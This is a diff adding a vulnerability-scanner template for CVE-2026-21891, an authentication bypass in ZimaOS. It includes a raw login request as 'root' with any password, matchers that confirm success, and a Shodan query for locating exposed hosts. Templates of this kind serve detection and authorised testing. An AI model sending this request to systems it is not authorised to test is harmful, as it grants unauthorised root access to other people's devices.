diff --git a/http/cves/2026/CVE-2026-21891.yaml b/http/cves/2026/CVE-2026-21891.yaml new file mode 100644 index 000000000000..5dbe16cea213 --- /dev/null +++ b/http/cves/2026/CVE-2026-21891.yaml @@ -0,0 +1,64 @@ +id: CVE-2026-21891 + +info: + name: ZimaOS - Authentication Bypass + author: DhiyaneshDk + severity: critical + description: | + ZimaOS <= 1.5.0 contains a broken authentication caused by improper password validation for known system service accounts in the login function, letting attackers authenticate with any password for these accounts, exploit requires knowledge of common usernames. + impact: | + Attackers can gain authenticated access to system service accounts without valid passwords, potentially compromising the system. + remediation: | + Update to a fixed version when available or apply patches to properly validate passwords for system service accounts. + reference: + - https://github.com/IceWhaleTech/ZimaOS/security/advisories/GHSA-xj93-qw9p-jxq4 + - https://nvd.nist.gov/vuln/detail/CVE-2026-21891 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L + cvss-score: 9.4 + cve-id: CVE-2026-21891 + cwe-id: CWE-287 + epss-score: 0.00059 + epss-percentile: 0.18386 + cpe: cpe:2.3:o:zimaspace:zimaos:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: html:"ZimaOS" + product: zimaos + vendor: zimaspace + tags: cve,cve2026,zimaos,auth-bypass,broken-auth + +http: + - raw: + - | + POST /v1/users/login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Content-Type: application/json + Origin: {{RootURL}} + Referer: {{RootURL}}/ + + { + "username": "root", + "password": "anything" + } + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "success" + - "username" + - "created_at" + condition: and + + - type: word + part: content_type + words: + - "application/json" + + - type: status + status: + - 200